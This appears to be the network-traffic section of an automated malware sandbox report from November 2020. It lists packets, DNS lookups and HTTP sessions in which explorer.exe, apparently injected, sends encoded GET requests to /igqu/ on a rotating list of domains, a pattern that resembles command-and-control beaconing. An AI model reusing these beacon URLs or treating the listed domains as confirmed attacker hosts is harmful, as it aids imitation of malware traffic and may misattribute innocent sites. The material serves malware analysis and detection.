Nov 21, 2020 09:22:53.254484892 CET | 443 | 49730 | 20.190.129.133 | 192.168.2.5
Nov 21, 2020 09:22:53.255224943 CET | 49730 | 443 | 192.168.2.5 | 20.190.129.133
Nov 21, 2020 09:22:53.255281925 CET | 49730 | 443 | 192.168.2.5 | 20.190.129.133
Nov 21, 2020 09:22:53.277554989 CET | 443 | 49695 | 20.190.129.133 | 192.168.2.5
Nov 21, 2020 09:22:53.277585030 CET | 443 | 49695 | 20.190.129.133 | 192.168.2.5
Nov 21, 2020 09:22:53.277607918 CET | 443 | 49695 | 20.190.129.133 | 192.168.2.5
Nov 21, 2020 09:22:53.277630091 CET | 443 | 49695 | 20.190.129.133 | 192.168.2.5
Nov 21, 2020 09:22:53.277651072 CET | 443 | 49695 | 20.190.129.133 | 192.168.2.5
Nov 21, 2020 09:22:53.277668953 CET | 49695 | 443 | 192.168.2.5 | 20.190.129.133
Nov 21, 2020 09:22:53.277669907 CET | 443 | 49695 | 20.190.129.133 | 192.168.2.5
Nov 21, 2020 09:22:53.277690887 CET | 49695 | 443 | 192.168.2.5 | 20.190.129.133
Nov 21, 2020 09:22:53.277690887 CET | 443 | 49695 | 20.190.129.133 | 192.168.2.5
Nov 21, 2020 09:22:53.277717113 CET | 443 | 49695 | 20.190.129.133 | 192.168.2.5
Nov 21, 2020 09:22:53.277730942 CET | 49695 | 443 | 192.168.2.5 | 20.190.129.133
Nov 21, 2020 09:22:53.277740002 CET | 443 | 49695 | 20.190.129.133 | 192.168.2.5
Nov 21, 2020 09:22:53.277792931 CET | 49695 | 443 | 192.168.2.5 | 20.190.129.133
Nov 21, 2020 09:22:53.291327000 CET | 443 | 49730 | 20.190.129.133 | 192.168.2.5
Nov 21, 2020 09:22:53.291438103 CET | 443 | 49730 | 20.190.129.133 | 192.168.2.5
Nov 21, 2020 09:22:53.343966007 CET | 443 | 49730 | 20.190.129.133 | 192.168.2.5
Nov 21, 2020 09:22:53.433021069 CET | 443 | 49730 | 20.190.129.133 | 192.168.2.5
Nov 21, 2020 09:22:53.433052063 CET | 443 | 49730 | 20.190.129.133 | 192.168.2.5
Nov 21, 2020 09:22:53.433072090 CET | 443 | 49730 | 20.190.129.133 | 192.168.2.5
Nov 21, 2020 09:22:53.433095932 CET | 443 | 49730 | 20.190.129.133 | 192.168.2.5
Nov 21, 2020 09:22:53.433118105 CET | 443 | 49730 | 20.190.129.133 | 192.168.2.5
Nov 21, 2020 09:22:53.433146954 CET | 49730 | 443 | 192.168.2.5 | 20.190.129.133
                                                                                Nov 21, 2020 09:22:53.433171034 CET4434973020.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.433191061 CET49730443192.168.2.520.190.129.133
                                                                                Nov 21, 2020 09:22:53.433204889 CET4434973020.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.433224916 CET4434973020.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.433233976 CET49730443192.168.2.520.190.129.133
                                                                                Nov 21, 2020 09:22:53.433257103 CET4434973020.190.129.133192.168.2.5
                                                                                Nov 21, 2020 09:22:53.433281898 CET49730443192.168.2.520.190.129.133
                                                                                Nov 21, 2020 09:22:53.481157064 CET49730443192.168.2.520.190.129.133
                                                                                Nov 21, 2020 09:23:15.893409967 CET44349709104.79.89.181192.168.2.5
                                                                                Nov 21, 2020 09:23:15.893455029 CET44349709104.79.89.181192.168.2.5
                                                                                Nov 21, 2020 09:23:15.893728018 CET49709443192.168.2.5104.79.89.181
                                                                                Nov 21, 2020 09:23:16.834300041 CET804968093.184.220.29192.168.2.5
                                                                                Nov 21, 2020 09:23:16.834589005 CET4968080192.168.2.593.184.220.29
                                                                                Nov 21, 2020 09:23:17.156352997 CET4968680192.168.2.584.53.167.113
                                                                                Nov 21, 2020 09:23:17.173095942 CET804968684.53.167.113192.168.2.5
                                                                                Nov 21, 2020 09:23:17.173181057 CET4968680192.168.2.584.53.167.113
                                                                                Nov 21, 2020 09:23:17.402542114 CET804967893.184.220.29192.168.2.5
                                                                                Nov 21, 2020 09:23:17.402818918 CET4967880192.168.2.593.184.220.29
                                                                                Nov 21, 2020 09:23:17.780802965 CET4969880192.168.2.593.184.220.29
                                                                                Nov 21, 2020 09:23:17.797017097 CET804969893.184.220.29192.168.2.5
                                                                                Nov 21, 2020 09:23:17.797126055 CET4969880192.168.2.593.184.220.29
                                                                                Nov 21, 2020 09:23:18.182488918 CET49704443192.168.2.540.67.254.36
                                                                                Nov 21, 2020 09:23:18.218991041 CET4434970440.67.254.36192.168.2.5
                                                                                Nov 21, 2020 09:23:18.246812105 CET804967993.184.220.29192.168.2.5
                                                                                Nov 21, 2020 09:23:18.246939898 CET4967980192.168.2.593.184.220.29
                                                                                Nov 21, 2020 09:23:18.264447927 CET49704443192.168.2.540.67.254.36
                                                                                Nov 21, 2020 09:23:18.661657095 CET49705443192.168.2.5204.79.197.200
                                                                                Nov 21, 2020 09:23:18.661828041 CET4970880192.168.2.593.184.220.29
                                                                                Nov 21, 2020 09:23:18.661988020 CET49706443192.168.2.5204.79.197.200
                                                                                Nov 21, 2020 09:23:19.009052992 CET804969993.184.220.29192.168.2.5
                                                                                Nov 21, 2020 09:23:19.009216070 CET4969980192.168.2.593.184.220.29
                                                                                Nov 21, 2020 09:23:19.443249941 CET49709443192.168.2.5104.79.89.181
                                                                                Nov 21, 2020 09:23:19.443615913 CET4971080192.168.2.593.184.220.29
                                                                                Nov 21, 2020 09:23:22.889450073 CET4974080192.168.2.513.224.93.48
                                                                                Nov 21, 2020 09:23:22.905661106 CET804974013.224.93.48192.168.2.5
                                                                                Nov 21, 2020 09:23:22.907377005 CET4974080192.168.2.513.224.93.48
                                                                                Nov 21, 2020 09:23:22.907758951 CET4974080192.168.2.513.224.93.48
                                                                                Nov 21, 2020 09:23:22.923935890 CET804974013.224.93.48192.168.2.5
                                                                                Nov 21, 2020 09:23:22.924204111 CET804974013.224.93.48192.168.2.5
                                                                                Nov 21, 2020 09:23:22.924357891 CET804974013.224.93.48192.168.2.5
                                                                                Nov 21, 2020 09:23:22.924613953 CET4974080192.168.2.513.224.93.48
                                                                                Nov 21, 2020 09:23:22.924678087 CET4974080192.168.2.513.224.93.48
                                                                                Nov 21, 2020 09:23:22.947079897 CET804974013.224.93.48192.168.2.5
                                                                                Nov 21, 2020 09:23:28.134789944 CET4974680192.168.2.5104.161.26.87
                                                                                Nov 21, 2020 09:23:28.310134888 CET8049746104.161.26.87192.168.2.5
                                                                                Nov 21, 2020 09:23:28.311305046 CET4974680192.168.2.5104.161.26.87
                                                                                Nov 21, 2020 09:23:28.311546087 CET4974680192.168.2.5104.161.26.87
                                                                                Nov 21, 2020 09:23:28.488259077 CET8049746104.161.26.87192.168.2.5
                                                                                Nov 21, 2020 09:23:28.490438938 CET8049746104.161.26.87192.168.2.5
                                                                                Nov 21, 2020 09:23:28.490461111 CET8049746104.161.26.87192.168.2.5
                                                                                Nov 21, 2020 09:23:28.490744114 CET4974680192.168.2.5104.161.26.87
                                                                                Nov 21, 2020 09:23:28.491008043 CET4974680192.168.2.5104.161.26.87
                                                                                Nov 21, 2020 09:23:28.666471004 CET8049746104.161.26.87192.168.2.5
                                                                                Nov 21, 2020 09:23:33.563186884 CET4974780192.168.2.534.102.136.180
                                                                                Nov 21, 2020 09:23:33.579900980 CET804974734.102.136.180192.168.2.5
                                                                                Nov 21, 2020 09:23:33.579996109 CET4974780192.168.2.534.102.136.180
                                                                                Nov 21, 2020 09:23:33.580173016 CET4974780192.168.2.534.102.136.180
                                                                                Nov 21, 2020 09:23:33.596736908 CET804974734.102.136.180192.168.2.5
                                                                                Nov 21, 2020 09:23:33.695125103 CET804974734.102.136.180192.168.2.5
                                                                                Nov 21, 2020 09:23:33.695177078 CET804974734.102.136.180192.168.2.5

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 21, 2020 09:22:38.956687927 CET | 49992 | 53 | 192.168.2.5 | 8.8.8.8
Nov 21, 2020 09:22:38.994410992 CET | 53 | 49992 | 8.8.8.8 | 192.168.2.5
Nov 21, 2020 09:22:45.375660896 CET | 60075 | 53 | 192.168.2.5 | 8.8.8.8
Nov 21, 2020 09:22:45.402854919 CET | 53 | 60075 | 8.8.8.8 | 192.168.2.5
Nov 21, 2020 09:22:46.455682039 CET | 55016 | 53 | 192.168.2.5 | 8.8.8.8
Nov 21, 2020 09:22:46.482789040 CET | 53 | 55016 | 8.8.8.8 | 192.168.2.5
Nov 21, 2020 09:22:47.314817905 CET | 64345 | 53 | 192.168.2.5 | 8.8.8.8
Nov 21, 2020 09:22:47.341952085 CET | 53 | 64345 | 8.8.8.8 | 192.168.2.5
Nov 21, 2020 09:22:48.419157982 CET | 57128 | 53 | 192.168.2.5 | 8.8.8.8
Nov 21, 2020 09:22:48.446239948 CET | 53 | 57128 | 8.8.8.8 | 192.168.2.5
Nov 21, 2020 09:22:50.595700026 CET | 54791 | 53 | 192.168.2.5 | 8.8.8.8
Nov 21, 2020 09:22:50.622940063 CET | 53 | 54791 | 8.8.8.8 | 192.168.2.5
Nov 21, 2020 09:22:51.953351974 CET | 50463 | 53 | 192.168.2.5 | 8.8.8.8
Nov 21, 2020 09:22:51.980514050 CET | 53 | 50463 | 8.8.8.8 | 192.168.2.5
Nov 21, 2020 09:22:53.604816914 CET | 50394 | 53 | 192.168.2.5 | 8.8.8.8
Nov 21, 2020 09:22:53.631861925 CET | 53 | 50394 | 8.8.8.8 | 192.168.2.5
Nov 21, 2020 09:23:15.479948997 CET | 58530 | 53 | 192.168.2.5 | 8.8.8.8
Nov 21, 2020 09:23:15.532522917 CET | 53 | 58530 | 8.8.8.8 | 192.168.2.5
Nov 21, 2020 09:23:18.213177919 CET | 53813 | 53 | 192.168.2.5 | 8.8.8.8
Nov 21, 2020 09:23:18.248826027 CET | 53 | 53813 | 8.8.8.8 | 192.168.2.5
Nov 21, 2020 09:23:18.422950029 CET | 63732 | 53 | 192.168.2.5 | 8.8.8.8
Nov 21, 2020 09:23:18.458712101 CET | 53 | 63732 | 8.8.8.8 | 192.168.2.5
Nov 21, 2020 09:23:18.531532049 CET | 57344 | 53 | 192.168.2.5 | 8.8.8.8
Nov 21, 2020 09:23:18.567003012 CET | 53 | 57344 | 8.8.8.8 | 192.168.2.5
Nov 21, 2020 09:23:19.925831079 CET | 54450 | 53 | 192.168.2.5 | 8.8.8.8
Nov 21, 2020 09:23:19.953804970 CET | 53 | 54450 | 8.8.8.8 | 192.168.2.5
Nov 21, 2020 09:23:22.456265926 CET | 59261 | 53 | 192.168.2.5 | 8.8.8.8
Nov 21, 2020 09:23:22.507450104 CET | 53 | 59261 | 8.8.8.8 | 192.168.2.5
Nov 21, 2020 09:23:22.830262899 CET | 57151 | 53 | 192.168.2.5 | 8.8.8.8
Nov 21, 2020 09:23:22.877538919 CET | 53 | 57151 | 8.8.8.8 | 192.168.2.5
Nov 21, 2020 09:23:25.220252037 CET | 59413 | 53 | 192.168.2.5 | 8.8.8.8
Nov 21, 2020 09:23:25.257458925 CET | 53 | 59413 | 8.8.8.8 | 192.168.2.5
Nov 21, 2020 09:23:27.941052914 CET | 60516 | 53 | 192.168.2.5 | 8.8.8.8
Nov 21, 2020 09:23:28.133266926 CET | 53 | 60516 | 8.8.8.8 | 192.168.2.5
Nov 21, 2020 09:23:33.503963947 CET | 51649 | 53 | 192.168.2.5 | 8.8.8.8
Nov 21, 2020 09:23:33.561815023 CET | 53 | 51649 | 8.8.8.8 | 192.168.2.5
Nov 21, 2020 09:23:38.743644953 CET | 65086 | 53 | 192.168.2.5 | 8.8.8.8
Nov 21, 2020 09:23:38.790599108 CET | 53 | 65086 | 8.8.8.8 | 192.168.2.5
Nov 21, 2020 09:23:44.261045933 CET | 56432 | 53 | 192.168.2.5 | 8.8.8.8
Nov 21, 2020 09:23:44.335588932 CET | 53 | 56432 | 8.8.8.8 | 192.168.2.5
Nov 21, 2020 09:23:49.385682106 CET | 52929 | 53 | 192.168.2.5 | 8.8.8.8
Nov 21, 2020 09:23:49.425587893 CET | 53 | 52929 | 8.8.8.8 | 192.168.2.5
Nov 21, 2020 09:23:54.665210009 CET | 64317 | 53 | 192.168.2.5 | 8.8.8.8
Nov 21, 2020 09:23:54.881589890 CET | 61004 | 53 | 192.168.2.5 | 8.8.8.8
Nov 21, 2020 09:23:54.908885002 CET | 53 | 61004 | 8.8.8.8 | 192.168.2.5
Nov 21, 2020 09:23:55.013375998 CET | 53 | 64317 | 8.8.8.8 | 192.168.2.5
Nov 21, 2020 09:24:00.443555117 CET | 56895 | 53 | 192.168.2.5 | 8.8.8.8
Nov 21, 2020 09:24:00.489475965 CET | 53 | 56895 | 8.8.8.8 | 192.168.2.5
Nov 21, 2020 09:24:05.758873940 CET | 62372 | 53 | 192.168.2.5 | 8.8.8.8
Nov 21, 2020 09:24:05.805286884 CET | 53 | 62372 | 8.8.8.8 | 192.168.2.5
Nov 21, 2020 09:24:10.843276024 CET | 61515 | 53 | 192.168.2.5 | 8.8.8.8
Nov 21, 2020 09:24:10.885566950 CET | 53 | 61515 | 8.8.8.8 | 192.168.2.5
Nov 21, 2020 09:24:16.247052908 CET | 56675 | 53 | 192.168.2.5 | 8.8.8.8
Nov 21, 2020 09:24:16.574513912 CET | 53 | 56675 | 8.8.8.8 | 192.168.2.5
Nov 21, 2020 09:24:22.247894049 CET | 57172 | 53 | 192.168.2.5 | 8.8.8.8
Nov 21, 2020 09:24:22.287492037 CET | 53 | 57172 | 8.8.8.8 | 192.168.2.5
Nov 21, 2020 09:24:27.463037014 CET | 55267 | 53 | 192.168.2.5 | 8.8.8.8
Nov 21, 2020 09:24:27.507025957 CET | 53 | 55267 | 8.8.8.8 | 192.168.2.5
Nov 21, 2020 09:24:32.888231039 CET | 50969 | 53 | 192.168.2.5 | 8.8.8.8
Nov 21, 2020 09:24:32.940440893 CET | 53 | 50969 | 8.8.8.8 | 192.168.2.5
Nov 21, 2020 09:24:38.092770100 CET | 64362 | 53 | 192.168.2.5 | 8.8.8.8
Nov 21, 2020 09:24:38.254417896 CET | 53 | 64362 | 8.8.8.8 | 192.168.2.5

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 21, 2020 09:23:22.456265926 CET | 192.168.2.5 | 8.8.8.8 | 0x31ef | Standard query (0) | g.msn.com | A (IP address) | IN (0x0001)
Nov 21, 2020 09:23:22.830262899 CET | 192.168.2.5 | 8.8.8.8 | 0x7901 | Standard query (0) | www.ariasu-nakanokaikei.com | A (IP address) | IN (0x0001)
Nov 21, 2020 09:23:27.941052914 CET | 192.168.2.5 | 8.8.8.8 | 0x46f5 | Standard query (0) | www.allan-wren.com | A (IP address) | IN (0x0001)
Nov 21, 2020 09:23:33.503963947 CET | 192.168.2.5 | 8.8.8.8 | 0xa6 | Standard query (0) | www.theoutdoorbed.com | A (IP address) | IN (0x0001)
Nov 21, 2020 09:23:38.743644953 CET | 192.168.2.5 | 8.8.8.8 | 0xe18c | Standard query (0) | www.sweetbasilmarketing.com | A (IP address) | IN (0x0001)
Nov 21, 2020 09:23:44.261045933 CET | 192.168.2.5 | 8.8.8.8 | 0x838b | Standard query (0) | www.pasumaisangam.com | A (IP address) | IN (0x0001)
Nov 21, 2020 09:23:49.385682106 CET | 192.168.2.5 | 8.8.8.8 | 0x4987 | Standard query (0) | www.justsoldbykristen.com | A (IP address) | IN (0x0001)
Nov 21, 2020 09:23:54.665210009 CET | 192.168.2.5 | 8.8.8.8 | 0x9b7f | Standard query (0) | www.lotoencasa.com | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:00.443555117 CET | 192.168.2.5 | 8.8.8.8 | 0xa07d | Standard query (0) | www.guidesgold.net | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:05.758873940 CET | 192.168.2.5 | 8.8.8.8 | 0xa0ec | Standard query (0) | www.indorebodybilaspur.com | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:10.843276024 CET | 192.168.2.5 | 8.8.8.8 | 0xeebf | Standard query (0) | www.thoughtslate.com | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:16.247052908 CET | 192.168.2.5 | 8.8.8.8 | 0x3a8b | Standard query (0) | www.chemtradent.com | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:22.247894049 CET | 192.168.2.5 | 8.8.8.8 | 0xfd93 | Standard query (0) | www.erpsystem.site | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:27.463037014 CET | 192.168.2.5 | 8.8.8.8 | 0xfd85 | Standard query (0) | www.forbigdogs.com | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:32.888231039 CET | 192.168.2.5 | 8.8.8.8 | 0x88b2 | Standard query (0) | www.rockinglifefromhome.com | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:38.092770100 CET | 192.168.2.5 | 8.8.8.8 | 0x7179 | Standard query (0) | www.allmm.info | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 21, 2020 09:23:22.507450104 CET | 8.8.8.8 | 192.168.2.5 | 0x31ef | No error (0) | g.msn.com | g-msn-com-nsatc.trafficmanager.net |  | CNAME (Canonical name) | IN (0x0001)
Nov 21, 2020 09:23:22.877538919 CET | 8.8.8.8 | 192.168.2.5 | 0x7901 | No error (0) | www.ariasu-nakanokaikei.com |  | 13.224.93.48 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:23:22.877538919 CET | 8.8.8.8 | 192.168.2.5 | 0x7901 | No error (0) | www.ariasu-nakanokaikei.com |  | 13.224.93.90 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:23:22.877538919 CET | 8.8.8.8 | 192.168.2.5 | 0x7901 | No error (0) | www.ariasu-nakanokaikei.com |  | 13.224.93.97 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:23:22.877538919 CET | 8.8.8.8 | 192.168.2.5 | 0x7901 | No error (0) | www.ariasu-nakanokaikei.com |  | 13.224.93.64 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:23:28.133266926 CET | 8.8.8.8 | 192.168.2.5 | 0x46f5 | No error (0) | www.allan-wren.com |  | 104.161.26.87 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:23:33.561815023 CET | 8.8.8.8 | 192.168.2.5 | 0xa6 | No error (0) | www.theoutdoorbed.com | theoutdoorbed.com |  | CNAME (Canonical name) | IN (0x0001)
Nov 21, 2020 09:23:33.561815023 CET | 8.8.8.8 | 192.168.2.5 | 0xa6 | No error (0) | theoutdoorbed.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:23:38.790599108 CET | 8.8.8.8 | 192.168.2.5 | 0xe18c | No error (0) | www.sweetbasilmarketing.com | sweetbasilmarketing.com |  | CNAME (Canonical name) | IN (0x0001)
Nov 21, 2020 09:23:38.790599108 CET | 8.8.8.8 | 192.168.2.5 | 0xe18c | No error (0) | sweetbasilmarketing.com |  | 185.201.11.126 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:23:44.335588932 CET | 8.8.8.8 | 192.168.2.5 | 0x838b | No error (0) | www.pasumaisangam.com |  | 3.127.175.50 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:23:49.425587893 CET | 8.8.8.8 | 192.168.2.5 | 0x4987 | No error (0) | www.justsoldbykristen.com |  | 52.71.133.130 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:23:55.013375998 CET | 8.8.8.8 | 192.168.2.5 | 0x9b7f | No error (0) | www.lotoencasa.com |  | 192.155.168.14 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:00.489475965 CET | 8.8.8.8 | 192.168.2.5 | 0xa07d | No error (0) | www.guidesgold.net | parking.namesilo.com |  | CNAME (Canonical name) | IN (0x0001)
Nov 21, 2020 09:24:00.489475965 CET | 8.8.8.8 | 192.168.2.5 | 0xa07d | No error (0) | parking.namesilo.com |  | 204.188.203.155 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:00.489475965 CET | 8.8.8.8 | 192.168.2.5 | 0xa07d | No error (0) | parking.namesilo.com |  | 192.161.187.200 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:00.489475965 CET | 8.8.8.8 | 192.168.2.5 | 0xa07d | No error (0) | parking.namesilo.com |  | 45.58.190.82 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:00.489475965 CET | 8.8.8.8 | 192.168.2.5 | 0xa07d | No error (0) | parking.namesilo.com |  | 70.39.125.244 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:00.489475965 CET | 8.8.8.8 | 192.168.2.5 | 0xa07d | No error (0) | parking.namesilo.com |  | 64.32.22.102 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:00.489475965 CET | 8.8.8.8 | 192.168.2.5 | 0xa07d | No error (0) | parking.namesilo.com |  | 168.235.88.209 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:00.489475965 CET | 8.8.8.8 | 192.168.2.5 | 0xa07d | No error (0) | parking.namesilo.com |  | 198.251.81.30 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:00.489475965 CET | 8.8.8.8 | 192.168.2.5 | 0xa07d | No error (0) | parking.namesilo.com |  | 198.251.84.92 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:00.489475965 CET | 8.8.8.8 | 192.168.2.5 | 0xa07d | No error (0) | parking.namesilo.com |  | 107.161.23.204 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:00.489475965 CET | 8.8.8.8 | 192.168.2.5 | 0xa07d | No error (0) | parking.namesilo.com |  | 209.141.38.71 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:00.489475965 CET | 8.8.8.8 | 192.168.2.5 | 0xa07d | No error (0) | parking.namesilo.com |  | 188.164.131.200 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:05.805286884 CET | 8.8.8.8 | 192.168.2.5 | 0xa0ec | Server failure (2) | www.indorebodybilaspur.com | none | none | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:10.885566950 CET | 8.8.8.8 | 192.168.2.5 | 0xeebf | No error (0) | www.thoughtslate.com | parkingpage.namecheap.com |  | CNAME (Canonical name) | IN (0x0001)
Nov 21, 2020 09:24:10.885566950 CET | 8.8.8.8 | 192.168.2.5 | 0xeebf | No error (0) | parkingpage.namecheap.com |  | 198.54.117.211 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:10.885566950 CET | 8.8.8.8 | 192.168.2.5 | 0xeebf | No error (0) | parkingpage.namecheap.com |  | 198.54.117.212 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:10.885566950 CET | 8.8.8.8 | 192.168.2.5 | 0xeebf | No error (0) | parkingpage.namecheap.com |  | 198.54.117.210 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:10.885566950 CET | 8.8.8.8 | 192.168.2.5 | 0xeebf | No error (0) | parkingpage.namecheap.com |  | 198.54.117.215 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:10.885566950 CET | 8.8.8.8 | 192.168.2.5 | 0xeebf | No error (0) | parkingpage.namecheap.com |  | 198.54.117.217 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:10.885566950 CET | 8.8.8.8 | 192.168.2.5 | 0xeebf | No error (0) | parkingpage.namecheap.com |  | 198.54.117.216 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:10.885566950 CET | 8.8.8.8 | 192.168.2.5 | 0xeebf | No error (0) | parkingpage.namecheap.com |  | 198.54.117.218 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:16.574513912 CET | 8.8.8.8 | 192.168.2.5 | 0x3a8b | No error (0) | www.chemtradent.com |  | 45.194.171.26 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:22.287492037 CET | 8.8.8.8 | 192.168.2.5 | 0xfd93 | No error (0) | www.erpsystem.site | erpsystem.site |  | CNAME (Canonical name) | IN (0x0001)
Nov 21, 2020 09:24:22.287492037 CET | 8.8.8.8 | 192.168.2.5 | 0xfd93 | No error (0) | erpsystem.site |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:27.507025957 CET | 8.8.8.8 | 192.168.2.5 | 0xfd85 | No error (0) | www.forbigdogs.com | forbigdogs.com |  | CNAME (Canonical name) | IN (0x0001)
Nov 21, 2020 09:24:27.507025957 CET | 8.8.8.8 | 192.168.2.5 | 0xfd85 | No error (0) | forbigdogs.com |  | 81.169.145.95 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:32.940440893 CET | 8.8.8.8 | 192.168.2.5 | 0x88b2 | No error (0) | www.rockinglifefromhome.com | rockinglifefromhome.com |  | CNAME (Canonical name) | IN (0x0001)
Nov 21, 2020 09:24:32.940440893 CET | 8.8.8.8 | 192.168.2.5 | 0x88b2 | No error (0) | rockinglifefromhome.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 21, 2020 09:24:38.254417896 CET | 8.8.8.8 | 192.168.2.5 | 0x7179 | No error (0) | www.allmm.info | allmm.info |  | CNAME (Canonical name) | IN (0x0001)
Nov 21, 2020 09:24:38.254417896 CET | 8.8.8.8 | 192.168.2.5 | 0x7179 | No error (0) | allmm.info |  | 34.102.136.180 | A (IP address) | IN (0x0001)

                                                                                HTTP Request Dependency Graph

                                                                                • www.ariasu-nakanokaikei.com
                                                                                • www.allan-wren.com
                                                                                • www.theoutdoorbed.com
                                                                                • www.sweetbasilmarketing.com
                                                                                • www.pasumaisangam.com
                                                                                • www.justsoldbykristen.com
                                                                                • www.lotoencasa.com
                                                                                • www.guidesgold.net
                                                                                • www.thoughtslate.com
                                                                                • www.chemtradent.com
                                                                                • www.erpsystem.site
                                                                                • www.forbigdogs.com
                                                                                • www.rockinglifefromhome.com
                                                                                • www.allmm.info

                                                                                HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49740 | 13.224.93.48 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 21, 2020 09:23:22.907758951 CET | 264 | OUT | GET /igqu/?1b3H_Ni=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xt/OgRWZ9lL&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1
                                                                                Host: www.ariasu-nakanokaikei.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
Nov 21, 2020 09:23:22.924204111 CET | 265 | IN | HTTP/1.1 301 Moved Permanently
                                                                                Server: CloudFront
                                                                                Date: Sat, 21 Nov 2020 08:23:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 183
                                                                                Connection: close
                                                                                Location: https://www.ariasu-nakanokaikei.com/igqu/?1b3H_Ni=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xt/OgRWZ9lL&JXhpvv=OXXTgtL8CzU0PRx0
                                                                                X-Cache: Redirect from cloudfront
                                                                                Via: 1.1 c202f63846a430afd2d556266be8b50c.cloudfront.net (CloudFront)
                                                                                X-Amz-Cf-Pop: ZRH50-C1
                                                                                X-Amz-Cf-Id: IvrzCmMd-h2iLZwaz6t1hSr_hNGNKqs9Q0D7lXDME7vECDC-faQVBw==
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49746 | 104.161.26.87 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 21, 2020 09:23:28.311546087 CET | 5133 | OUT | GET /igqu/?1b3H_Ni=Jn5Vr1+14bH3XXZofqraFeWVa26wP8rJvzlWs5bnBoBEHljdRY0tb4g4rLkzBbL1dWSS&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1
                                                                                Host: www.allan-wren.com
                                                                                Connection: close
                                                                                Data Raw: 00 00 00 00 00 00 00
                                                                                Data Ascii:
Nov 21, 2020 09:23:28.490438938 CET | 5134 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Sat, 21 Nov 2020 08:23:26 GMT
                                                                                Content-Type: text/html; charset=GBK
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
